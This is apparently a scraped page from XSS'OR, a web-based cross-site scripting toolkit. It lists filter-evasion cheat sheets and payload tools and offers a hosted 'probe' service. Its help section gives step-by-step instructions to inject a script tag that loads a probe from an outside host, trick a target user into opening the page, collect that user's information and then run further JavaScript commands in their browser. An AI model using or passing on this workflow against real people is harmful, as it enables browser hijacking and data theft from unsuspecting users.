XSS'OR

\u&#x; ,c&#&#;

/

CREATOR CODZ

|

VECTOR CODZ
CODZ DESC AUTHOR UPDATE
XSSMisc A XSS fuzzing misc. evilcos 2017/--
BXFBypass Browser's XSS Filter Bypass Cheat Sheet. Masato 2017/--
RSnakeXSS Classical XSS Filter Evasion Cheat Sheet. RSnake 2017/02
HTML5Sec More than HTML5 Security Cheatsheet. .mario 2017/01
PAYLOAD CODZ
CODZ DESC AUTHOR UPDATE
BeEF Browser Exploitation Framework Project. BeEF 2017/--
ExtProbe Chrome installed extensions/plugins. evi1m0 2017/01
CORSBOT IAMANEWBOTNAMEDCORSBOT. evilcos 2017/01
XSSProbe A small but classical XSS probe. evilcos 2014/01
xss.swf A tiny tool for Flash hacking. evilcos 2013/03
AttackAPI JavaScript AttackAPI from GNUCITIZEN. pdp 2007/01
REMOTE CONTROL

Create Probe

INPUT THIS STRING: vybwbps TO
.js

DO NOT BE BAD.
One-time probe means you can just only use one time per day.

HELP

WARNING!!

DO NOT BE BAD.
This Probe, you can just only use one time per day.
This Probe, just only the most basic Probe:)

1ST STAGE

1. Create Probe.

2. Inject "PROBE LINK" to a HTML page, eg:
<script/src="http://xssor.io/probe/wuvwuup.js"></script>

3. Cheat target user access this HTML page.

4. Wait for target user online...

2ND STAGE

*. The "RESULT LINK" is target user info.

*. Inject your CMD(JavaScript Codz) to fun more.

ABOUT
▒██   ██▒  ██████   ██████  ▒█████   ██▀███  
▒▒ █ █ ▒░▒██    ▒ ▒██    ▒ ▒██▒  ██▒▓██ ▒ ██▒
░░  █   ░░ ▓██▄   ░ ▓██▄   ▒██░  ██▒▓██ ░▄█ ▒
 ░ █ █ ▒   ▒   ██▒  ▒   ██▒▒██   ██░▒██▀▀█▄  
▒██▒ ▒██▒▒██████▒▒▒██████▒▒░ ████▓▒░░██▓ ▒██▒
▒▒ ░ ░▓ ░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░ ▒░▒░▒░ ░ ▒▓ ░▒▓░
░░   ░▒ ░░ ░▒  ░ ░░ ░▒  ░ ░  ░ ▒ ▒░   ░▒ ░ ▒░
 ░    ░  ░  ░  ░  ░  ░  ░  ░ ░ ░ ▒    ░░   ░ 
 ░    ░        ░        ░      ░ ░     ░     
        

XSS'OR - Hack with JavaScript.
I will try to evolve XSS'OR. Yes, i have more ideas. But if you have some good ideas, please also contact me:
evilcos@gmail.com, Twitter: @evilcos

SLOGAN

BE EVIL, DON'T BE BAD.

THANKS

JS Beautifier crypto-js evi1m0 jackmasa xisigr ...

CHANGELOG

XSS'OR V2

UPDATE: 2017/05/07

*. Encode/Decode, enhanced.

*. Codz, enhanced.

*. Probe, free to try.

*. Complete rewriting with Python, Django, Bootstrap, jQuery, ...

*. Independent domain: xssor.io.

XSS'OR V1

UPDATE: 2008/04/05

*. Online: http://evilcos.me/lab/xssor

*. Open source: https://github.com/evilcos/xssor